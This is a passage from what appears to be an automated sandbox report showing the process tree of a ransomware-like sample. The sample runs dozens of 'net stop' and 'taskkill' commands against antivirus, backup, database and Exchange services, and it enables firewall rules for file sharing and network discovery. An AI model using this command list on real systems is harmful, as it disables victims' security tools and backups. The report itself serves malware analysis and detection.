- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:15848
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:11656
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSA /y
    3⤵
    PID:6116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:8924
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:10740
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:10076
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Agent” /y
    3⤵
    PID:8904
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:9028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:10084
- - C:\Windows\system32\net.exe
    "net.exe" stop mfemms /y
    3⤵
    PID:11212
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:4188
- - C:\Windows\system32\net.exe
    "net.exe" stop SepMasterService /y
    3⤵
    PID:8280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:10116
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:9888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:16040
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:10368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:10932
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPS /y
    3⤵
    PID:4496
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:2288
- - C:\Windows\system32\net.exe
    "net.exe" stop RESvc /y
    3⤵
    PID:11624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RESvc /y
      4⤵
      PID:2056
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:7856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:2176
- - C:\Windows\system32\net.exe
    "net.exe" stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:3904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:13664
- - C:\Windows\system32\net.exe
    "net.exe" stop ShMonitor /y
    3⤵
    PID:13244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:16244
- - C:\Windows\system32\net.exe
    "net.exe" stop “intel(r) proset monitoring service” /y
    3⤵
    PID:10868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
      4⤵
      PID:16296
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeimap4 /y
    3⤵
    PID:12408
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeimap4 /y
      4⤵
      PID:14628
- - C:\Windows\system32\net.exe
    "net.exe" stop mfevtp /y
    3⤵
    PID:14772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:2300
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:12500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:1600
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:1592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:13316
- - C:\Windows\system32\net.exe
    "net.exe" stop sms_site_sql_backup /y
    3⤵
    PID:15744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sms_site_sql_backup /y
      4⤵
      PID:13720
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Client” /y
    3⤵
    PID:13712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Client” /y
      4⤵
      PID:13288
- - C:\Windows\system32\net.exe
    "net.exe" stop W3Svc /y
    3⤵
    PID:12456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:12404
- - C:\Windows\system32\net.exe
    "net.exe" stop ARSM /y
    3⤵
    PID:14508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:14044
- - C:\Windows\system32\net.exe
    "net.exe" stop Smcinst /y
    3⤵
    PID:12128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:12412
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:14464
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:7268
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSRS /y
    3⤵
    PID:10604
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:8544
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:11052
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:9956
- - C:\Windows\system32\net.exe
    "net.exe" stop unistoresvc_1af40a /y
    3⤵
    PID:4432
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop unistoresvc_1af40a /y
      4⤵
      PID:7228
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Health Service” /y
    3⤵
    PID:9444
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Health Service” /y
      4⤵
      PID:9904
- - C:\Windows\system32\net.exe
    "net.exe" stop SmcService /y
    3⤵
    PID:2644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:4880
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:4536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:11576
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Message Router” /y
    3⤵
    PID:11752
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Message Router” /y
      4⤵
      PID:11376
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:9360
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:11396
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:5168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:9268
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:4680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:14340
- - C:\Windows\system32\net.exe
    "net.exe" stop audioendpointbuilder /y
    3⤵
    PID:4784
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop audioendpointbuilder /y
      4⤵
      PID:11040
- - C:\Windows\system32\net.exe
    "net.exe" stop sacsvr /y
    3⤵
    PID:11544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:9252
- - C:\Windows\system32\net.exe
    "net.exe" stop SntpService /y
    3⤵
    PID:11368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:9256
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Safestore Service” /y
    3⤵
    PID:10992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
      4⤵
      PID:5908
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /
    3⤵
    PID:11204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:7112
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:4876
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:11312
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:10104
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:14812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:12852
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:9348
- - C:\Windows\system32\net.exe
    "net.exe" stop sophossps /y
    3⤵
    PID:7356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophossps /y
      4⤵
      PID:11628
- - C:\Windows\system32\net.exe
    "net.exe" stop AVP /y
    3⤵
    PID:5100
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:14604
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVAdminService /y
    3⤵
    PID:11256
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:10376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:11444
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos System Protection Service” /y
    3⤵
    PID:12496
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
      4⤵
      PID:4236
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:12856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:4308
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:13884
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:12460
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:12316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:4152
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVService /y
    3⤵
    PID:13848
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:9240
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:13744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:9344
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:14620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:4644
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:5148
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:10876
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:9304
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:10400
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Web Control Service” /y
    3⤵
    PID:10844
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
      4⤵
      PID:11180
- - C:\Windows\system32\net.exe
    "net.exe" stop DCAgent /y
    3⤵
    PID:10928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:11552
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_filter /y
    3⤵
    PID:9092
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:9380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_filter /y
      4⤵
      PID:12492
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:5076
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:12632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:4824
- - C:\Windows\system32\net.exe
    "net.exe" stop svcGenericHost /y
    3⤵
    PID:4792
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop svcGenericHost /y
      4⤵
      PID:4488
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:4348
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:4312
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:4996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:11064
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROD /y
    3⤵
    PID:12124
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:12704
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:9436
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:12940
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
      4⤵
      PID:11116
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_service /y
    3⤵
    PID:10140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_service /y
      4⤵
      PID:7980
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:1704
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:5568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:5560
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:6704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:7648
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:6804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:6692
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update /y
    3⤵
    PID:12752
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:4156
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:6872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:5484
- - C:\Windows\system32\net.exe
    "net.exe" stop WRSVC /y
    3⤵
    PID:10700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:11128
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:13084
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:6816
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:5208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:14440
- - C:\Windows\system32\net.exe
    "net.exe" stop mssql$vim_sqlexp /y
    3⤵
    PID:12220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
      4⤵
      PID:13140
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update_64 /y
    3⤵
    PID:14432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update_64 /y
      4⤵
      PID:15444
- - C:\Windows\system32\net.exe
    "net.exe" stop Antivirus /y
    3⤵
    PID:14908
- - C:\Windows\system32\net.exe
    "net.exe" stop vapiendpoint /y
    3⤵
    PID:3228
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop vapiendpoint /y
      4⤵
      PID:15004
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:12188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:10664
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:15380
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:10428
- - C:\Windows\system32\net.exe
    "net.exe" stop TmCCSF /y
    3⤵
    PID:5260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TmCCSF /y
      4⤵
      PID:6624
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:10820
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:16292
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLBrowser /y
    3⤵
    PID:12196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:13888
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos File Scanner Service” /y
    3⤵
    PID:10340
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:9480
- - C:\Windows\system32\net.exe
    "net.exe" stop msftesql$PROD /y
    3⤵
    PID:9508
- - C:\Windows\system32\net.exe
    "net.exe" stop tmlisten /y
    3⤵
    PID:5448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop tmlisten /y
      4⤵
      PID:7596
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeES /y
    3⤵
    PID:14576
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Filter Service” /y
    3⤵
    PID:8664
- - C:\Windows\system32\net.exe
    "net.exe" stop SMTPSvc /y
    3⤵
    PID:4356
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:12724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:5608
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamMountSvc /y
    3⤵
    PID:8012
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:5784
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer110 /y
    3⤵
    PID:14700
- - C:\Windows\system32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:8720
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKey /y
    3⤵
    PID:13128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKey /y
      4⤵
      PID:12768
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:16120
- - C:\Windows\system32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:10652
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:12964
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:13972
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:1404
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:15012
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:5704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyScheduler /y
      4⤵
      PID:6352
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:13080
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:6940
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:14888
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:7988
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:6388
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    PID:5596
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:12960
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:8036
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:5852
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:14000
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:11832
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:7068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:4728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:6916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:5240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:6920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
1⤵
PID:2128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:4352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
1⤵
PID:4420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:4128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
1⤵
PID:4144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:2416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:15348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:15340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:15332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:15324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
1⤵
PID:15308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:15300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:15292

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:15284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:15276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:15268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:15260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:15252

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:15236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:15228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:15220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:15212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:15204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:15196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:15188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:15180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:15172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:15152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:15144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:15136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:15128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:15120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:15100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:14976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:14968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:14960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:14952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:14944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:14936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:14732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:14724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:14716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:14708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:14700
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop MsDtsServer110 /y
  2⤵
  PID:15120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:14692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:14684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:14676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:4236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:3092

C:\Windows\SysWOW64\net1.exe
